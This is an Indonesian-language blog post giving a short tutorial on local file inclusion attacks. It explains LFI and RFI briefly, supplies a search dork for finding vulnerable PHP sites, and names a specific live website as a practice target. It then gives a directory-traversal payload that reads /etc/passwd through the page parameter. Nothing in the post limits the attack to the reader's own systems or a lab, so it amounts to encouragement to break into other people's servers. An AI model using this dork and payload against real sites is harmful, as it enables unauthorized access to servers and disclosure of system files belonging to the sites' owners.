Assalamualaikum warahmatullahi wb Kali ini adalah tutorial local file inclusion caraya gampang banget simak baik² yh
Sebelum Lanjut apa itu Lfi LFI (Local File Inclusion) adalah sebuah bug pada site dimana kita bisa mengakses semua file di dalam server hanya dengan melalui URL. RFI (Remote File Inclusion) adalah sebuah bug dimana site mengizinkan kita meng-include-kan file dari luar server. ... Maka isi dari file etc/passwd akan ditampilkan begitu saja di browser.
Bahaya Lfi ,LFI merupakan kerentanan yang sangat berbahaya, ini bisa membuat seorang penyerang bisa mengelabui aplikasi web kalian termasuk file berbahaya.
Okeh udah tau kan Lfi itu apa
Langsung aja gas ke tutorial nya
Bahan²
1. Dork inurl://site .com php?page=
2.kouta
3.hp/PC
Langsung aja mulai
Nih Target Untuk kalian coba
https://www.kukiki.com.tw/index.php?page=
Cara eksekusi Lfi Gimana???
target.com/php?page contoh
Kita kasih ../../../
Nah otomatis website akan blank
Terus Kita tambahkan etc/passwd
target.com/php?page=../../../etc/passwd
Dan seterusnya .
Kurang lebih jelas nya seperti gambar di bawah Yah
Oke bro Semoga bermanfaat Bye wassalamu'alaikum warahmatullahi wb Selamat Berpuasa bagi yang menjalankan nya
By FindinNet
Komentar
Posting Komentar